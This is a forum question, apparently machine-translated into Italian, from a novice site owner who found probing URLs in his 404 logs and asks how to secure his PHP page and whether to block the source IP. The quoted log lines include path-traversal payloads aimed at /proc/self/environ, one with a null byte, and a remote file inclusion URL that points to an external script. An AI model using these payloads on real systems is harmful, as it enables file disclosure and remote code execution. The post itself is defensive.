Guardando attraverso i miei 404 registri ho notato i seguenti due URL, entrambi verificati una volta:
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ
e
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00
La pagina in questione library.php
richiede una type
variabile con una mezza dozzina di valori accettabili diversi e quindi una id
variabile. Quindi potrebbe essere un URL valido
library.php?type=Circle-K&id=Strange-Things-Are-Afoot
e gli ID vengono tutti eseguiti mysql_real_escape_string
prima di essere utilizzati per eseguire query sul database.
Sono un novellino, ma mi sembra che entrambi questi link siano semplici attacchi contro il webroot?
1) Qual è il modo migliore per proteggere da questo genere di cose oltre a un 404?
2) Devo autorizzare gli IP responsabili?
EDIT: anche appena notato questo
/library.php=http://www.basfalt.no/scripts/danger.txt
EDIT 2: L'IP offensivo per tutti e 3 gli attacchi è stato 216.97.231.15
rintracciato in un ISP chiamato Lunar Pages situato appena fuori Los Angeles.
EDIT 3: Ho deciso di chiamare l'ISP venerdì mattina ora locale e discutere il problema con chiunque riesca a ottenere al telefono. Pubblicherò i risultati qui tra circa 24 ore.
EDIT 4: Ho finito per mandare un'e-mail ai loro amministratori e loro hanno risposto prima che "ci stavano esaminando" e poi il giorno dopo con "questo problema dovrebbe essere risolto ora". Non ci sono ulteriori dettagli, purtroppo.
type
dice allo script che include di usare (sebbene attraverso un IF $_GET['type'] == 'thing') {} ESLE...
, non come un collegamento diretto come include 'type.php'
) e id
viene eseguito attraverso mysql_real_escape_string e che viene utilizzato per le query. Sapendolo, sono ancora al sicuro?